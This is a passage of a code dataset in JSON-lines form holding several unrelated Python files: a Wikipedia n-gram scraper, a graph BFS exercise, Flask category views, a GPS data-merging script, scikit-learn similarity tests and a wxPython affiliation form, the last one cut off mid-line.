"inventory.models.OpeningStock.objects", "line_number": 144, "usage_type": "attribute"}, {"api_name": "inventory.models.OpeningStock", "line_number": 144, "usage_type": "name"}, {"api_name": "simplejson.dumps", "line_number": 163, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 164, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 166, "usage_type": "name"}, {"api_name": "inventory.models.OpeningStock.objects.all", "line_number": 168, "usage_type": "call"}, {"api_name": "inventory.models.OpeningStock.objects", "line_number": 168, "usage_type": "attribute"}, {"api_name": "inventory.models.OpeningStock", "line_number": 168, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 169, "usage_type": "call"}, {"api_name": "django.views.generic.base.View", "line_number": 171, "usage_type": "name"}, {"api_name": "inventory.models.InventoryItem.objects.all", "line_number": 174, "usage_type": "call"}, {"api_name": "inventory.models.InventoryItem.objects", "line_number": 174, "usage_type": "attribute"}, {"api_name": "inventory.models.InventoryItem", "line_number": 174, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 175, "usage_type": "call"}]} +{"seq_id": "528148126", "text": "from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nimport re\nimport string\n\n\ndef clean_input(text):\n text = re.sub('\\n+', \" \", text)\n text = re.sub('\\[[0-9]*\\]', \"\", text)\n text = re.sub(' +', \" \", text)\n text = bytes(text, \"UTF-8\")\n text = text.decode(\"ascii\", \"ignore\")\n text = text.split(' ')\n result = []\n for item in text:\n item = item.strip(string.punctuation)\n if len(item) > 1:\n result.append(item)\n return result\n\n\ndef get_ngrams(text, n):\n text = clean_input(text)\n result = []\n for i in range(len(text)-n+1):\n result.append(text[i:i+n])\n return result\n\n\nhtml = urlopen(\"https://en.wikipedia.org/wiki/Steve_Jobs\")\nbsObj = BeautifulSoup(html, \"lxml\")\ncontent = bsObj.find(\"div\", {\"id\": \"mw-content-text\"}).get_text()\nngrams = get_ngrams(content, 2)\nprint(ngrams)\nprint(\"2-grams couont is \" + str(len(ngrams)))", "sub_path": "Python/WebScraping/Chapter07/Ngram.py", "file_name": "Ngram.py", "file_ext": "py", "file_size_in_byte": 903, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 8, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 9, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 10, "usage_type": "call"}, {"api_name": "string.punctuation", "line_number": 16, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 30, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 31, "usage_type": "call"}]} +{"seq_id": "410808470", "text": "from collections import deque\n\n\ndef from_edge(n, lst):\n new_lst = [[] for i in range(n)]\n for i in lst:\n j = i[0] - 1\n k = i[1] - 1\n new_lst[k].append(i[0] - 1)\n new_lst[j].append(i[1] - 1)\n return new_lst\n\n\ndef bfs(graph, n):\n for start in range(n - 1):\n for finish in range(start, n):\n queue = deque([start])\n dist = [None] * len(graph)\n dist[start] = 0\n while len(queue) != 0:\n v = queue.popleft()\n for i in graph[v]:\n if dist[i] is None:\n queue.append(i)\n dist[i] = dist[v] + 1\n dist_finish = dist[finish]\n if (dist_finish is None) or dist_finish > 2:\n return 'NO'\n return 'YES'\n\n\ntwo_in = open('two.in', 'r')\ntwo_out = open('two.out', 'w')\n\nn, m = map(int, two_in.readline().split())\ngraph = []\nfor i in range(m):\n graph.append(list(map(int, two_in.readline().split())))\ntwo_in.close()\n\ngraph = from_edge(n, graph)\nprint(bfs(graph, n), file=two_out)\ntwo_out.close()\n", "sub_path": "lKSH/day06/two.py", "file_name": "two.py", "file_ext": "py", "file_size_in_byte": 1100, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 17, "usage_type": "call"}]} +{"seq_id": "55333704", "text": "from flask import request, flash, redirect, url_for\n\nfrom app import db\nfrom app.forms import CategoryForm\nfrom app.utils import page_render, get_form_payload\n\n\ndef categories():\n items = db.categories.find({}).sort(\"name\")\n ctx = {\n 'title': 'Categories',\n 'items': items\n }\n return page_render('categories/list.html', ctx)\n\n\ndef new_category():\n form = CategoryForm(request.form)\n\n if request.method == 'POST' and form.validate_on_submit():\n data = get_form_payload(form)\n db.categories.replace_one({\"name\": data[\"name\"]}, data, upsert=True)\n flash(\"New Category Added!\", 'success')\n else:\n flash(\"Something went wrong!\", 'danger')\n return redirect(url_for('categories'))\n\n\ndef edit_category(id):\n form = CategoryForm(request.form)\n\n if request.method == 'POST' and form.validate_on_submit():\n data = get_form_payload(form)\n db.categories.update_one({\"_id\": id}, {\"$set\": data})\n flash(\"Updated Category!\", 'success')\n else:\n flash(\"Something went wrong!\", 'danger')\n return redirect(url_for('categories'))\n\n\ndef delete_category(id):\n db.categories.delete_one({\"_id\": id})\n flash(\"Category deleted!\", 'success')\n return redirect(url_for('categories'))\n", "sub_path": "app/views/categories.py", "file_name": "categories.py", "file_ext": "py", "file_size_in_byte": 1269, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "app.db.categories.find", "line_number": 9, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 9, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 9, "usage_type": "name"}, {"api_name": "app.utils.page_render", "line_number": 14, "usage_type": "call"}, {"api_name": "app.forms.CategoryForm", "line_number": 18, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 18, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 18, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 20, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 20, "usage_type": "name"}, {"api_name": "app.utils.get_form_payload", "line_number": 21, "usage_type": "call"}, {"api_name": "app.db.categories.replace_one", "line_number": 22, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 22, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 22, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 23, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 26, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 26, "usage_type": "call"}, {"api_name": "app.forms.CategoryForm", "line_number": 30, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 30, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 30, "usage_type": "name"}, {"api_name": "flask.request.method", "line_number": 32, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 32, "usage_type": "name"}, {"api_name": "app.utils.get_form_payload", "line_number": 33, "usage_type": "call"}, {"api_name": "app.db.categories.update_one", "line_number": 34, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 34, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 34, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.flash", "line_number": 37, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 38, "usage_type": "call"}, {"api_name": "app.db.categories.delete_one", "line_number": 42, "usage_type": "call"}, {"api_name": "app.db.categories", "line_number": 42, "usage_type": "attribute"}, {"api_name": "app.db", "line_number": 42, "usage_type": "name"}, {"api_name": "flask.flash", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.redirect", "line_number": 44, "usage_type": "call"}, {"api_name": "flask.url_for", "line_number": 44, "usage_type": "call"}]} +{"seq_id": "163851120", "text": "#!/usr/bin/env python\n\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\nimport time, sys\nfrom IPython.display import clear_output\n\nimport argparse\n\n\ndef f(t_gps, t_unix):\n t_unix_mod = np.floor(t_unix % 60)\n\n if t_gps != t_unix_mod:\n\n delta = t_unix_mod - t_gps\n #print(delta)\n #print(t_unix) \n if abs(delta) < 30:\n t_unix += -1 * delta\n elif abs(delta + 60) < 30:\n t_unix += (-1 * delta) - 60\n elif abs(delta - 60) < 30:\n t_unix += (-1 * delta) + 60\n else:\n print(\"GPS time differs by >60s from UNIX time.\")\n \n return t_unix\n\ndef update_progress(progress):\n bar_length = 20\n if isinstance(progress, int):\n progress = float(progress)\n if not isinstance(progress, float):\n progress = 0\n if progress < 0:\n progress = 0\n if progress >= 1:\n progress = 1\n\n block = int(round(bar_length * progress))\n\n clear_output(wait = True)\n text = \"Progress: [{0}] {1:.1f}%\".format( \"#\" * block + \"-\" * (bar_length - block), progress * 100)\n print(text)\n\nnumber_of_elements = 1000\n\n#for i in range(number_of_elements):\n #time.sleep(0.00001) #Replace this with a real computation\n# update_progress(i / number_of_elements)\n\n#update_progress(1)\n\ndef main(gps_file, tlrs_file, output=None):\n\n gps_df = pd.read_csv(gps_file)\n print(gps_df)\n sample = gps_df.loc[0::]\n\n x = sample.loc[:]['SGPSBA_POSITIONX']\n y = sample.loc[:]['SGPSBA_POSITIONY']\n z = sample.loc[:]['SGPSBA_POSITIONZ']\n\n lat = np.arctan2(z, np.sqrt(x**2 + y**2)) * 180. / np.pi\n lon = np.arctan2(y, x) * 180. / np.pi\n\n GPS_seconds = sample.loc[:]['SGPSBA_SECONDS']\n #Get MET and add subsections seconds\n UNIX_t = np.floor(sample.loc[:]['TSTAMP']-978307200)\n UNIX_t += sample.loc[:]['SGPSBA_SUBSECS']\n\n # Generate new data frame for time, lat, lon.\n tll_df = pd.DataFrame(data={'time': np.array([f(t_gps, t_unix) for t_gps, t_unix in zip(GPS_seconds, UNIX_t)]), \n 'lat':lat, \n 'lon':lon\n }\n )\n\n print(f\"Loaded TLL datafile {gps_file}.\")\n l_orig = len(tll_df)\n tll_df.drop_duplicates(subset='time', inplace=True)\n l_new = len(tll_df)\n print(f\"File contains {l_orig} entries and {l_new} non-duplicates.\")\n print(\"Done.\")\n\n\n # In[10]:\n\n\n # Last term drops the NaN at the end of the frame. \n tlrs_df = pd.read_csv(tlrs_file, header=None, delimiter=' ').iloc[:,0:-1] \n # Set column names. \n tlrs_df.columns = ['time' if x==0 else x-1 for x in tlrs_df.columns]\n print(f\"LRS data loaded. Number events: {len(tlrs_df)}\")\n print(len(tlrs_df))\n tlrs_df.drop_duplicates(subset='time', inplace=True)\n print(f\"LRS duplicates dropped. Remaining events: {len(tlrs_df)}\")\n print(len(tlrs_df))\n tlrs_sorted_df = tlrs_df.sort_values('time')\n print(\"LRS sorted.\")\n print(\"Done.\")\n\n\n merged = pd.merge(tll_df, tlrs_df, \n left_on=tll_df['time'].astype(int), \n right_on=tlrs_df['time'].astype(int), suffixes=['_tll', '_tlrs'],\n how='inner', copy=False)\n\n print(f\"Merge complete.\")\n print(len(merged))\n merged.drop_duplicates(subset=['time_tll', 'time_tlrs'], inplace=True)\n print(len(merged))\n\n\n if output is None:\n merged.to_csv('merged.csv')\n else:\n merged.to_csv(output)\n\n\n return\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description=\"Load and merge TLL and TLRS data files.\")\n\n parser.add_argument(\"--gps\", type=str, help=\"gps data file.\")\n parser.add_argument(\"--tlrs\", type=str, help=\"TLRS data file.\")\n parser.add_argument(\"--output\", type=str, help=\"Output filename.\" ) \n\n args = parser.parse_args()\n print(args)\n\n\n\n main(args.gps, args.tlrs, args.output)", "sub_path": "make_merged.py", "file_name": "make_merged.py", "file_ext": "py", "file_size_in_byte": 3949, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.floor", "line_number": 16, "usage_type": "call"}, {"api_name": "IPython.display.clear_output", "line_number": 47, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 61, "usage_type": "call"}, {"api_name": "numpy.arctan2", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 69, "usage_type": "attribute"}, {"api_name": "numpy.arctan2", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 70, "usage_type": "attribute"}, {"api_name": "numpy.floor", "line_number": 74, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 78, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 96, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 109, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 130, "usage_type": "call"}]} +{"seq_id": "278569717", "text": "# -*- coding: utf-8 -*-\n#\n# This file is part of Beard.\n# Copyright (C) 2015 CERN.\n#\n# Beard is a free software; you can redistribute it and/or modify it\n# under the terms of the Revised BSD License; see LICENSE file for\n# more details.\n\n\"\"\"Tests of transformers for paired data.\n\n.. codeauthor:: Gilles Louppe \n\n\"\"\"\n\nimport numpy as np\nfrom numpy.testing import assert_array_almost_equal\nimport scipy.sparse as sp\n\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import OneHotEncoder\nfrom sklearn.preprocessing import StandardScaler\n\nfrom beard.similarity import PairTransformer\nfrom beard.similarity import CosineSimilarity\nfrom beard.similarity import AbsoluteDifference\nfrom beard.similarity import JaccardSimilarity\nfrom beard.utils import FuncTransformer\n\n\ndef test_pair_transformer():\n \"\"\"Test for PairTransformer.\"\"\"\n X = np.array([[0, 1], [2, 0], [2, 5]], dtype=np.float)\n tf = PairTransformer(element_transformer=FuncTransformer(lambda v: v + 1))\n Xt = tf.fit_transform(X)\n assert_array_almost_equal(Xt, X + 1)\n\n X = np.array([[0, 1], [2, 0], [2, 5],\n [0, 1], [2, 0], [2, 5]], dtype=np.float)\n tf = PairTransformer(element_transformer=FuncTransformer(lambda v: v + 1),\n groupby=lambda r: r[0])\n Xt = tf.fit_transform(X)\n assert_array_almost_equal(Xt, X + 1)\n\n X = np.array([[0, 1], [2, 3], [4, 5]], dtype=np.float)\n Xt = PairTransformer(element_transformer=MinMaxScaler()).fit_transform(X)\n assert_array_almost_equal(Xt, [[0, 0.2], [0.4, 0.6], [0.8, 1.0]])\n\n X = np.array([[0, 1], [2, 3]], dtype=np.float)\n tf = PairTransformer(element_transformer=OneHotEncoder(sparse=True))\n Xt = tf.fit_transform(X)\n assert sp.issparse(Xt)\n assert_array_almost_equal(Xt.todense(), [[1, 0, 0, 0, 0, 1, 0, 0],\n [0, 0, 1, 0, 0, 0, 0, 1]])\n\n X = sp.csr_matrix(np.array([[0, 1], [2, 3]], dtype=np.float))\n tf = PairTransformer(element_transformer=StandardScaler(with_mean=False))\n Xt = tf.fit_transform(X)\n assert sp.issparse(Xt)\n assert_array_almost_equal(Xt.todense(), [[0, 0.89442719],\n [1.78885438, 2.68328157]])\n\n\ndef test_cosine_similarity():\n \"\"\"Test for CosineSimilarity.\"\"\"\n X = np.array([[1, 0, 0, 0, 0, 0],\n [1, 0, 1, 1, 0, 0],\n [1, 0, 0, 1, 0, 0],\n [0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1]])\n\n Xt = CosineSimilarity().fit_transform(X)\n assert_array_almost_equal(Xt, [[0.], [2 ** -0.5], [1.], [0.], [1.]])\n\n Xt = CosineSimilarity().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0.], [2 ** -0.5], [1.], [0.], [1.]])\n\n\ndef test_absolute_difference():\n \"\"\"Test for AbsoluteDifference.\"\"\"\n X = np.array([[0, 0, 0, 0],\n [0, 1, 1, 0],\n [1, 1, 1, 1],\n [1, 0, 0, 1]])\n\n Xt = AbsoluteDifference().fit_transform(X)\n assert_array_almost_equal(Xt, [[0, 0], [1, 1], [0, 0], [1, 1]])\n\n Xt = AbsoluteDifference().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0, 0], [1, 1], [0, 0], [1, 1]])\n\n\ndef test_JaccardSimilarity():\n \"\"\"Test for JaccardSimilarity.\"\"\"\n X = np.array([[0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 1, 1, 0, 1, 0, 1],\n [0, 1, 0, 1, 0, 0, 1, 0],\n [1, 0, 1, 1, 1, 1, 0, 7],\n [0, 3, 0, 1, 0, 9, 0, 1]])\n\n Xt = JaccardSimilarity().fit_transform(X)\n assert_array_almost_equal(Xt, [[0.], [0.33333333], [0.], [0.5], [1.]])\n\n Xt = JaccardSimilarity().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0.], [0.33333333], [0.], [0.5], [1.]])\n\n X = np.array([[0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 0]])\n\n Xt = JaccardSimilarity().fit_transform(X)\n assert_array_almost_equal(Xt, [[0.], [0.], [0.], [0.]])\n\n Xt = JaccardSimilarity().fit_transform(sp.csr_matrix(X))\n assert_array_almost_equal(Xt, [[0.], [0.], [0.], [0.]])\n", "sub_path": "tests/similarity/test_pairs.py", "file_name": "test_pairs.py", "file_ext": "py", "file_size_in_byte": 4166, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "51", "api": [{"api_name": "numpy.array", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 33, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 34, "usage_type": "call"}, {"api_name": "beard.utils.FuncTransformer", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 39, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 40, "usage_type": "call"}, {"api_name": "beard.utils.FuncTransformer", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 45, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 46, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 49, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.OneHotEncoder", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.sparse.issparse", "line_number": 52, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 52, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 56, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 56, "usage_type": "attribute"}, {"api_name": "beard.similarity.PairTransformer", "line_number": 57, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 57, "usage_type": "call"}, {"api_name": "scipy.sparse.issparse", "line_number": 59, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 59, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 66, "usage_type": "call"}, {"api_name": "beard.similarity.CosineSimilarity", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 73, "usage_type": "call"}, {"api_name": "beard.similarity.CosineSimilarity", "line_number": 75, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 75, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 75, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 81, "usage_type": "call"}, {"api_name": "beard.similarity.AbsoluteDifference", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 87, "usage_type": "call"}, {"api_name": "beard.similarity.AbsoluteDifference", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 89, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 89, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 95, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 102, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 104, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 104, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 107, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 112, "usage_type": "call"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 113, "usage_type": "call"}, {"api_name": "beard.similarity.JaccardSimilarity", "line_number": 115, "usage_type": "call"}, {"api_name": "scipy.sparse.csr_matrix", "line_number": 115, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 115, "usage_type": "name"}, {"api_name": "numpy.testing.assert_array_almost_equal", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "184898500", "text": "import wx\n\ntry:\n from agw import pycollapsiblepane as PCP\nexcept ImportError:\n import wx.lib.agw.pycollapsiblepane as PCP\n\nfrom src.wizard.controller.frmRequiredValidator \\\n import RequiredValidator\nfrom src.wizard.controller.frmRequiredComboValidator \\\n import RequiredComboValidator\n\nclass NewAffiliationView(wx.Panel):\n def __init__( self, parent ):\n wx.Panel.__init__ ( self, parent, id = wx.ID_ANY, pos = wx.DefaultPosition, size = wx.Size( 542,300 ), style = wx.TAB_TRAVERSAL )\n \n self.SetMinSize( wx.Size( 442,550 ) )\n \n bSizer80 = wx.BoxSizer( wx.VERTICAL )\n \n sbSizer22 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Person:\" ), wx.VERTICAL )\n \n bSizer35 = wx.BoxSizer( wx.HORIZONTAL )\n \n self.m_staticText31 = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"Existing person\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText31.Wrap( -1 )\n bSizer35.Add( self.m_staticText31, 0, wx.ALL, 5 )\n \n \n bSizer35.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n m_comboBox13Choices = []\n self.m_comboBox13 = wx.ComboBox( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"\", wx.DefaultPosition, wx.DefaultSize, m_comboBox13Choices, 0 )\n self.m_comboBox13.SetMinSize( wx.Size( 280,-1 ) )\n \n bSizer35.Add( self.m_comboBox13, 0, wx.ALL, 5 )\n \n \n sbSizer22.Add( bSizer35, 0, wx.EXPAND, 10 ) # Denver\n\n newPersonSizer = wx.BoxSizer( wx.VERTICAL )\n firstMiddleSizer = wx.BoxSizer(wx.HORIZONTAL)\n \n lblFirst = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"First Name:\",\n wx.DefaultPosition, wx.DefaultSize, 0)\n firstMiddleSizer.Add(lblFirst, 0, wx.ALL, 5)\n \n firstMiddleSizer.AddSpacer((0,0), 1, wx.EXPAND, 5)\n\n self.textFirst = wx.TextCtrl(sbSizer22.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(100,-1), validator=RequiredValidator())\n firstMiddleSizer.Add(self.textFirst, 0, wx.ALL, 5)\n \n lblMiddle = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"Middle:\",\n wx.DefaultPosition, wx.DefaultSize, 0)\n firstMiddleSizer.Add(lblMiddle, 0, wx.ALL, 5)\n \n self.textMiddle = wx.TextCtrl(sbSizer22.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(100,-1), 0)\n firstMiddleSizer.Add(self.textMiddle, 0, wx.ALL, 5)\n \n newPersonSizer.Add(firstMiddleSizer, 0, wx.EXPAND, 5) #denver\n\n lastSizer = wx.BoxSizer(wx.HORIZONTAL)\n \n lblLast = wx.StaticText( sbSizer22.GetStaticBox(), wx.ID_ANY, u\"Last Name:\",\n wx.DefaultPosition, wx.DefaultSize, 0)\n lastSizer.Add(lblLast, 0, wx.ALL, 5)\n \n lastSizer.AddSpacer((0,0), 1, wx.EXPAND, 5)\n\n self.textLast = wx.TextCtrl(sbSizer22.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), validator=RequiredValidator())\n lastSizer.Add(self.textLast, 0, wx.ALL, 5)\n \n newPersonSizer.Add(lastSizer, 0, wx.EXPAND, 5) # Denver\n\n sbSizer22.Add(newPersonSizer, 0, wx.EXPAND, 5) # Denver\n #self.cp = cp = PCP.PyCollapsiblePane(self, wx.ID_ANY, \"Add new person...\", agwStyle=wx.CP_GTK_EXPANDER, style=wx.CP_DEFAULT_STYLE)\n #self.MakePaneContent(cp.GetPane())\n \n #cpSizer.Add( cp, 1, wx.LEFT|wx.EXPAND, 25 )\n #sbSizer22.Add( cpSizer, 1, wx.EXPAND|wx.GROW, 5)\n \n \n bSizer80.Add( sbSizer22, 0, wx.EXPAND, 5 ) # Denver\n \n sbSizer221 = wx.StaticBoxSizer( wx.StaticBox( self, wx.ID_ANY, u\"Orgnaization:\" ), wx.VERTICAL )\n \n bSizer351 = wx.BoxSizer( wx.HORIZONTAL )\n \n self.m_staticText311 = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, u\"Existing organization\", wx.DefaultPosition, wx.DefaultSize, 0 )\n self.m_staticText311.Wrap( -1 )\n bSizer351.Add( self.m_staticText311, 0, wx.ALL, 5 )\n \n \n bSizer351.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n m_comboBox131Choices = []\n self.m_comboBox131 = wx.ComboBox( sbSizer221.GetStaticBox(), wx.ID_ANY, u\"\", wx.DefaultPosition, wx.DefaultSize, m_comboBox131Choices, 0 )\n self.m_comboBox131.SetMinSize( wx.Size( 280,-1 ) )\n \n bSizer351.Add( self.m_comboBox131, 0, wx.ALL, 5 )\n \n \n sbSizer221.Add( bSizer351, 0, wx.EXPAND, 5 ) #denver\n \n newOrgSizer = wx.BoxSizer(wx.HORIZONTAL)\n \n lblType = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Type:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblType.Wrap( -1 )\n newOrgSizer.Add(lblType, 0, wx.ALL, 5 )\n \n newOrgSizer.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n typeChoices = []\n self.orgTypeCombo = wx.ComboBox( sbSizer221.GetStaticBox(), wx.ID_ANY,\n u\"Select Type\", wx.DefaultPosition, wx.DefaultSize,\n typeChoices, validator=RequiredComboValidator() )\n self.orgTypeCombo.SetMinSize(wx.Size( 280,-1 ) )\n \n newOrgSizer.Add( self.orgTypeCombo, 0, wx.ALL, 5 )\n sbSizer221.Add(newOrgSizer, 0, wx.EXPAND, 5) #Denver\n \n newOrgSizer1 = wx.BoxSizer(wx.HORIZONTAL)\n \n lblCode = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Code:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblCode.Wrap( -1 )\n newOrgSizer1.Add(lblCode, 0, wx.ALL, 5 )\n newOrgSizer1.AddSpacer( ( 0, 0), 1, wx.EXPAND, 5 )\n \n self.textCode = wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), validator=RequiredValidator())\n newOrgSizer1.Add(self.textCode, 0, wx.ALL, 5)\n \n\n sbSizer221.Add(newOrgSizer1, 0, wx.EXPAND, 5 ) # Denver\n \n newOrgSizer2 = wx.BoxSizer(wx.HORIZONTAL)\n\n lblName = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Name:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblName.Wrap( -1 )\n newOrgSizer2.Add(lblName, 0, wx.ALL, 5 )\n \n newOrgSizer2.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.textName = wx.TextCtrl(sbSizer221.GetStaticBox(), wx.ID_ANY,\n wx.EmptyString,\n wx.DefaultPosition, wx.Size(280,-1), validator=RequiredValidator())\n newOrgSizer2.Add(self.textName, 0, wx.ALL, 5)\n \n sbSizer221.Add(newOrgSizer2, 0, wx.EXPAND, 5) #Denevr\n \n newOrgSizer3 = wx.BoxSizer(wx.HORIZONTAL)\n \n lblDesc = wx.StaticText( sbSizer221.GetStaticBox(), wx.ID_ANY, \n u\"Description:\", wx.DefaultPosition, wx.DefaultSize, 0)\n lblName.Wrap(-1)\n newOrgSizer3.Add(lblDesc, 0, wx.ALL, 5 )\n \n newOrgSizer3.AddSpacer((0,0), 1, wx.EXPAND, 5)\n \n self.textDesc = 